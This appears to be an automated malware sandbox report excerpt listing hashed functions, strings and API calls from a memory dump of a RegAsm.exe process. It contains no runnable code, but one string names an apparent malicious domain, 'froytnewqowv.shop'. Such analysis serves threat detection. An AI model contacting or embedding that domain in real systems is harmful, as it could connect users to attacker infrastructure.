        • Opcode ID: c0b385bb5debd8af29439994a80214152706220bf36f7be4e41de20da25049bf
        • Instruction ID: b2eb5fcff445d87dee3c412c222e2263a33ab48642889df12737349e2ca48c3e
        • Opcode Fuzzy Hash: c0b385bb5debd8af29439994a80214152706220bf36f7be4e41de20da25049bf
        • Instruction Fuzzy Hash: 22E10231A08381CFC7148F28E89072EB7F2AF8A714F188A7DE5E547392D7359855CB4A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: (/.-$4`[b
        • API String ID: 0-585808191
        • Opcode ID: d6cb2db4f893a06acebe1bb3f2213db90c88c9bc1bc07ea4ae53f0a0b418c89f
        • Instruction ID: 9fc0f2f554363a2a778dba9744a0e405d54d577cb6074d30e709afd75c1df894
        • Opcode Fuzzy Hash: d6cb2db4f893a06acebe1bb3f2213db90c88c9bc1bc07ea4ae53f0a0b418c89f
        • Instruction Fuzzy Hash: 54C1E1715082109BD715EF19C8A1A6BB3F1EF96314F08892EE4C597391E339EC41CB6B
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 4`[b$onml
        • API String ID: 0-2697692917
        • Opcode ID: 72047c627e3eb74e0b983af63a4d034344a34a11fb0d4b108296f89676ad0185
        • Instruction ID: 7dcc75f691ab13411dfd24b2605dd11a1d5283fc33109a1e341c97134b1bae92
        • Opcode Fuzzy Hash: 72047c627e3eb74e0b983af63a4d034344a34a11fb0d4b108296f89676ad0185
        • Instruction Fuzzy Hash: 7F81A974A08300CBD724DF14E890B6BB3F1EF86304F44892DE58987392E7799855CB9A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: $
        • API String ID: 0-1425349742
        • Opcode ID: 534442dbb763a926e66b693da97f98ce7ecca0b8056b46b53228cb8e0c2afe3d
        • Instruction ID: 6655583ca5fef1f58135e77d24631f2d41e558061a9a86ec1e8dd6944cd53ee0
        • Opcode Fuzzy Hash: 534442dbb763a926e66b693da97f98ce7ecca0b8056b46b53228cb8e0c2afe3d
        • Instruction Fuzzy Hash: 2E81BF34608302ABC710DF18D980A2BB7E2EF99754F29D92DE5C487361D735EC61CB9A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: "$"
        • API String ID: 0-3758156766
        • Opcode ID: 4525d932518236bb5693353f43468a12d9a228cc76120ea0a9b821a7244aa01e
        • Instruction ID: 651d75b7e001f264c39b7e5292b3356677e06ba095e4f2280ad6d40eb0d314bd
        • Opcode Fuzzy Hash: 4525d932518236bb5693353f43468a12d9a228cc76120ea0a9b821a7244aa01e
        • Instruction Fuzzy Hash: 9B91C572B083218BD714CE29D44031FFBE2AFD5750F698A2EE498973A4D739DC468786
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 4`[b$onml
        • API String ID: 0-2697692917
        • Opcode ID: 5fd0337816c6b9d8347be188b4f1db227d1c100013c80befc13ea26395526d3e
        • Instruction ID: 76863e3e92a9efb7f53202ce03b01bfcfed846a96e6d040762aef8eff9f3fbd6
        • Opcode Fuzzy Hash: 5fd0337816c6b9d8347be188b4f1db227d1c100013c80befc13ea26395526d3e
        • Instruction Fuzzy Hash: FE01323460C3448BD315EF08E490A2AB7F0EF4A305F64882DE1C987362D33AA861CB4A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: *$bEA
        • API String ID: 0-2776968665
        • Opcode ID: d4cd93dc498b1313109d5607366495c35bab75df43ae303e8e28570318ec24d5
        • Instruction ID: fd501069fd264d809ae619123aed5b38f35764916a5c7758494844f51cee1508
        • Opcode Fuzzy Hash: d4cd93dc498b1313109d5607366495c35bab75df43ae303e8e28570318ec24d5
        • Instruction Fuzzy Hash: 7D0122B050C380ABC340EF59D580A1EBBF5EBAA708F542E1DE1C89B352C374D9548B9A
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2b10f450330e23ccd97d5b0edb6aefb3f87e93e9e02cab937bdece38a158ae01
        • Instruction ID: 065b55a46bd003d0309ad9292501d3cda01c5d94a068ae396ad66ea2e5d450a9
        • Opcode Fuzzy Hash: 2b10f450330e23ccd97d5b0edb6aefb3f87e93e9e02cab937bdece38a158ae01
        • Instruction Fuzzy Hash: 75D1C034609212EFD704CF28D89076AB3E6EF89314F18893DE985D7391D739E961CB4A
        APIs
        • CoCreateInstance.OLE32(00438538,00000000,00000001,00438528), ref: 00419169
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: CreateInstance
        • String ID:
        • API String ID: 542301482-0
        • Opcode ID: 5e422f0a8c460f69b1a87f90d0f39c04e05f1328b037a2973c1776121fe45670
        • Instruction ID: 8740be46327c451d178ff566c3411891260d9b1695f017a3d13bacb2e9870746
        • Opcode Fuzzy Hash: 5e422f0a8c460f69b1a87f90d0f39c04e05f1328b037a2973c1776121fe45670
        • Instruction Fuzzy Hash: CF51D1B1640204ABDB209B64CCA6BA733B4EF85368F144959F9458B3D1F379ED81C72A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: "
        • API String ID: 0-123907689
        • Opcode ID: 3e1d0d75cd803ff25e5e8952406537c0af8e8607f5ad0a7e932edbcf9746dbd7
        • Instruction ID: 842228f2b59bd4dbd5bbab8fc9b32e1b7e878de475dc68b932edb89dc74c53f1
        • Opcode Fuzzy Hash: 3e1d0d75cd803ff25e5e8952406537c0af8e8607f5ad0a7e932edbcf9746dbd7
        • Instruction Fuzzy Hash: 9FD15872B083209FC714CE25A44076BB7EAAF94310F59856EF85987392E738DD44C7DA
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID: 0-3019521637
        • Opcode ID: 70d21ae3325e249cc2d1863d6a9b32c484c61923207258b0b186c1ea56b1ded2
        • Instruction ID: a11bad8a5117d6008fa8afd295ab5da61cb6abc6f9e6800b254883442853e389
        • Opcode Fuzzy Hash: 70d21ae3325e249cc2d1863d6a9b32c484c61923207258b0b186c1ea56b1ded2
        • Instruction Fuzzy Hash: 4791BE34208312ABC714DF18D490A2BB3E1FF89744F19E92DE9858B351E735EC61CB9A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID: 0-3019521637
        • Opcode ID: 73e5d13f241908827d1f3693456dc44e2ca49ef14a3c4ae2f49d96f1a2a7bc0d
        • Instruction ID: f23b7510866d6ae72eb0c1bc0bc094d71102c9efb2610442adc6adee68c30d61
        • Opcode Fuzzy Hash: 73e5d13f241908827d1f3693456dc44e2ca49ef14a3c4ae2f49d96f1a2a7bc0d
        • Instruction Fuzzy Hash: 7B417F74208201ABD718DF15D991B2FB7E1EF89704F25982DE58987351C379EC60CB5A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID: 0-3019521637
        • Opcode ID: 943259fdc1551cf42ee4e111727b636990cc9f36da26f45479c24218037b0e60
        • Instruction ID: 980d032a2ccab8b13fc54050dfb9ef671ec0b839e70ad6ed49583019234b5b0b
        • Opcode Fuzzy Hash: 943259fdc1551cf42ee4e111727b636990cc9f36da26f45479c24218037b0e60
        • Instruction Fuzzy Hash: 0E416C74208302ABD714DF14D990B2BB7E5EF89704F26982DE5C987391C379EC61CB5A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: ^'A
        • API String ID: 0-1115494859
        • Opcode ID: 1a4a8eb445baa188e5e7a4cf8b0482d4fd67054580c74f24571caad32a4e6156
        • Instruction ID: 203798fe745c7220f1c2eab9da18ecd5ea8b2d81011be8df25f5f8d277f5cacd
        • Opcode Fuzzy Hash: 1a4a8eb445baa188e5e7a4cf8b0482d4fd67054580c74f24571caad32a4e6156
        • Instruction Fuzzy Hash: A52157706083818FD758CF25E59076BB7F1AB8A308F485C2DE49AD3291D778E815CB5A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InitializeThunk
        • String ID:
        • API String ID: 2994545307-3019521637
        • Opcode ID: 2d058f2f8de9a2dcc9848fe31210da34a762378bb3631bbbea18fa36358c80ac
        • Instruction ID: 875a26e279d7381d0af767f6c00f5f85f65134fa295d14b1ebe10ffff4b4c7e0
        • Opcode Fuzzy Hash: 2d058f2f8de9a2dcc9848fe31210da34a762378bb3631bbbea18fa36358c80ac
        • Instruction Fuzzy Hash: 7811A235508244AFD300EF18D94092BB7F9FB99744F54991EEAC453311D3B9ED21CB9A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: ]A
        • API String ID: 0-3942631043
        • Opcode ID: 04a3fd9999e6ecfc76036dbf5dee8a176cbe408347b4fe7652bde634114f2f17
        • Instruction ID: 7f6e6c05b7f8f05a7ae5c04d311609f6adbde687a93e1d8a3b9919adef772a54
        • Opcode Fuzzy Hash: 04a3fd9999e6ecfc76036dbf5dee8a176cbe408347b4fe7652bde634114f2f17
        • Instruction Fuzzy Hash: 980175B5D00615BBEB109FA59C4ABEF7E78EB0A314F504115F615B32C1D37499108BF6
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d4f17ceddfb5241087e9c57c7a95d82c784a2e9bfe4846ee70c9b688d5bff275
        • Instruction ID: 064834dbd3d1054dd233962f981297999305c84d226ad575e0cdd7f360641099
        • Opcode Fuzzy Hash: d4f17ceddfb5241087e9c57c7a95d82c784a2e9bfe4846ee70c9b688d5bff275
        • Instruction Fuzzy Hash: 3852C3B16083458FCB14CF14C0906AABBE1BFC9314F198A7EE99967391D778E845CF89
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e8f763939b2cee4f850320c00966844c6e6f1c79b71503d7d58ff62e43b177fd
        • Instruction ID: 9a842cbe924d001d4efeaaa345915f8c7242cdd81e2c076dfa7d48468fe1765f
        • Opcode Fuzzy Hash: e8f763939b2cee4f850320c00966844c6e6f1c79b71503d7d58ff62e43b177fd
        • Instruction Fuzzy Hash: E7E1D47160C7818BC319CE28C4E026BFBE2AFD5314F288A6EE4D6573D6D6389D45CB46
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 16c0b4d655480e21df94844036d9e90936d9e09815273aedee5e4568dcf98db1
        • Instruction ID: d4b2d70a6bda1a082e1dd372b14f4466324b72ac5c87dc8cb21ce7fbef2df808
        • Opcode Fuzzy Hash: 16c0b4d655480e21df94844036d9e90936d9e09815273aedee5e4568dcf98db1
        • Instruction Fuzzy Hash: E3814574604641CFE3248F28C8A0B27B7F6FF4A705F24992DE5D6877A1D734A815CB89
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0cd7e78f6e072d29a2cb5640edb0ae9d2340d7a64075e57dd1611cf9108de512
        • Instruction ID: 84e8ea41ee2fa4a408cd962cf6b7fbc1c887c5fb02869ff04425e89c505035da
        • Opcode Fuzzy Hash: 0cd7e78f6e072d29a2cb5640edb0ae9d2340d7a64075e57dd1611cf9108de512
        • Instruction Fuzzy Hash: C8A1147010C3918FD324CF59C5A075FFBE2ABC6708F44891DE4EA6B281C778990ACB96
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2f735a305843e7261033a0ea418a6c7406f55c97029b295ec72b354e0d80f762
        • Instruction ID: eef38122a372146c7dc8ca99d4a2e2ceaf4d41f073e4a183094bf46801ec1ca0
        • Opcode Fuzzy Hash: 2f735a305843e7261033a0ea418a6c7406f55c97029b295ec72b354e0d80f762
        • Instruction Fuzzy Hash: 8F61CE35208212DFD304CF28D8E066AB3A2FF89315F1989BDD985972A1C739E966CB45
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 10313183f2584f887ee6fddf3a8a644a9567b3c62f96c4de2e6a20931a2521e9
        • Instruction ID: a34cf8c9b3263d986cef6c7a4f2b3ed8ccbd40b807e0fd2d544b2ec9381f7a00
        • Opcode Fuzzy Hash: 10313183f2584f887ee6fddf3a8a644a9567b3c62f96c4de2e6a20931a2521e9
        • Instruction Fuzzy Hash: D931FE31A042009BC7119E19D880927BBE5EFC5359F14853EE899EF3C2D339DE52CB4A
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
        • Instruction ID: b69e15c13213328031daa6fc29d6b273f428c9ad2818b706eacf13d1ac7ca9a0
        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
        • Instruction Fuzzy Hash: F911EC337051E50FC316CD3C94005657F930B93634B5D839AFCB5972D2D6268D8A835A
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 43676ebcf58ec10a06ef5f61cdcabf1e7382bafc69ccf0f619f461c0d6ee15e2
        • Instruction ID: 31a0624a4a46d16e19d5b355f68729ef89125fcf4f20361c633fe1305b320aad
        • Opcode Fuzzy Hash: 43676ebcf58ec10a06ef5f61cdcabf1e7382bafc69ccf0f619f461c0d6ee15e2
        • Instruction Fuzzy Hash: 220175F270031157E721AE66A8C173BB6E85F81708F58453EE80567383EB79EC45C699
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
        • Instruction ID: 61e5d2be95d78edd54caaac1bb55599e16c5a953c8f2358b80d4956ee11b2de8
        • Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
        • Instruction Fuzzy Hash: B201A27BA013139B9324CE5DC4E0AABB3B0FF86794B1A446ED5801B371D7319D998264
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 4589a01fcbf53c33c173ba8121fd841452cd6f4a327d92e30b51b332093802db
        • Instruction ID: e11f0ee1f075e1e901a9b13e82fcc15b54626e6f218dbd9b55903be9e8aae077
        • Opcode Fuzzy Hash: 4589a01fcbf53c33c173ba8121fd841452cd6f4a327d92e30b51b332093802db
        • Instruction Fuzzy Hash: 58F02B767183150FA310DDBA9CC8927B3E5E7D9314B080139EF50D7341D535D801D1E8
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 783cc59b554c714dab426553ce58be7964f6c22e1baddd6690b101552204b045
        • Instruction ID: 3fc446d2c8d8437f42dc4d6f3e8ddbc02f80558e7a69112f4d3dc03e7a12f602
        • Opcode Fuzzy Hash: 783cc59b554c714dab426553ce58be7964f6c22e1baddd6690b101552204b045
        • Instruction Fuzzy Hash: 96F05CF1A0411037DB22CD859CC0F77BF9CCB8B758F09086AE84193202D1759984C3E9
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a0ff4968333533510a584e1eec7dd6e447b9ff8387ce9556cc3f2703954da562
        • Instruction ID: a0d2468f465293a4e4ff370f25d342222911c81806e90c25baaa396ef0c5de9c
        • Opcode Fuzzy Hash: a0ff4968333533510a584e1eec7dd6e447b9ff8387ce9556cc3f2703954da562
        • Instruction Fuzzy Hash: 8201EFB46093819FE308DF28D491A2BB7E4AF86304F044C6DF495A7691E338D9198B6A
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ab7c002bbd1d2b19c651350f826b154a225611c78f68c3023b16f09186cf9dc2
        • Instruction ID: 9fc6d226bfb1604207242c1f049888613e19608d57fecf5ad2bb85126009cf98
        • Opcode Fuzzy Hash: ab7c002bbd1d2b19c651350f826b154a225611c78f68c3023b16f09186cf9dc2
        • Instruction Fuzzy Hash: CCE0C237B0522107A764CE369C21677F3E1EBDA721F4DA62EE142E3248D238C8418268
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 54d114e315e1278ad0bb405f2103492c513b9ddf5d70b869fc0a4a3a0a19a325
        • Instruction ID: 55d4172f3244f021d817f9b096e4600c5599b633775831c15ef76054ad7f78f4
        • Opcode Fuzzy Hash: 54d114e315e1278ad0bb405f2103492c513b9ddf5d70b869fc0a4a3a0a19a325
        • Instruction Fuzzy Hash: 86D017B0949348ABD154AA12CC46F37B67CAB8B609F44290CF5C9272C1E6A5E914C72A
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3e5f5303165e91f16e1e8b19cc459c076d162991286b36ddc253054db009ee91
        • Instruction ID: ab8cdcc03201a52952a345f7ea54a144f4610d0c64eb4def9f98c58a5c069279
        • Opcode Fuzzy Hash: 3e5f5303165e91f16e1e8b19cc459c076d162991286b36ddc253054db009ee91
        • Instruction Fuzzy Hash: 19B09230A18201AE8200CE1088800B5F6B5628F241F30B8258049A3112D230E5418B8E
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6fd3766918e89df8a05e257ca795833cd2a575d954b4001750cb2654bfadbcc9
        • Instruction ID: 6ba26a1bffbc1308ef423d47b87c80740494c3e6e5ed07ba0644021aaf96ce3c
        • Opcode Fuzzy Hash: 6fd3766918e89df8a05e257ca795833cd2a575d954b4001750cb2654bfadbcc9
        • Instruction Fuzzy Hash: A3B09230A082008F8200CF04C080465F7B4A78F201F20B054D008A3222C230E4008B88
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: Variant$ClearInit
        • String ID: #$+$+$1$5$:
        • API String ID: 2610073882-3087341364
        • Opcode ID: 0e036653b9d14adfec31b3634da6ee46a983eaf88ee37d663b34d55c39bb5962
        • Instruction ID: 9298a9f606e848f4f3e6587390da7264498acbc491bd68e4a9d42526ddd2c4e3
        • Opcode Fuzzy Hash: 0e036653b9d14adfec31b3634da6ee46a983eaf88ee37d663b34d55c39bb5962
        • Instruction Fuzzy Hash: A8410960108BC18ED726DF3C8488606BFA06B26324F08869DD8E54F3D7C774D515DBA6
        APIs
        • GetSystemDirectoryW.KERNEL32(4FDD498F,00000104), ref: 0040D9EB
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
        Similarity
        • API ID: DirectorySystem
        • String ID: {OG$TW$froytnewqowv.shop
        • API String ID: 2188284642-1958746240
        • Opcode ID: 89c259094a7adb61a5788674474846ab91c95ccaf2b26d7fe638388223d8980b
        • Instruction ID: 6f7664552f2f1e33eb5c38cf136155b76137aa14af66036d354a58f4bd12b393
        • Opcode Fuzzy Hash: 89c259094a7adb61a5788674474846ab91c95ccaf2b26d7fe638388223d8980b
        • Instruction Fuzzy Hash: A9C188B050E3909FD3318F15D884B9BBBE1EBCA318F144A6DD4C86B291C7359909CB9B